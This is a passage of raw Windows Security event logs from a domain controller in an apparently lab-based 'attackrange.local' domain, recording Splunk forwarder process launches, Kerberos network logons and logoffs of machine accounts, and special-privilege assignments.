EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265123
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x8e0
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265124
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x111c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265126
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x198c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265125
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1538
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:58:55 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265127
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: ATTACKRANGE\WIN-HOST-797$
Account Name: WIN-HOST-797$
Account Domain: ATTACKRANGE
Logon ID: 0x8BD93F
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265130
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C2230
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265129
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C2230
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 65000
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:58:56 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265128
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C2230
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:07 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265131
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x650
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265144
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x4dc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265143
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3067
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265142
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3155
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=265141
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C319D
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265140
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C325A
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {271648EC-6A60-17D5-CF0E-2D75C946746E}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65005
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265139
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C325A
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265138
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C319D
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: 10.0.1.14
Source Port: 65004
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265137
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C319D
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265136
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C3155
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 0
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265135
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3155
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=265134
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x8C3067
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 65003
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=265133
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x8C3067
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 03:59:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19c4
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265145
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x138c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265146
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x74c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=265148
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa28
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 03:59:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
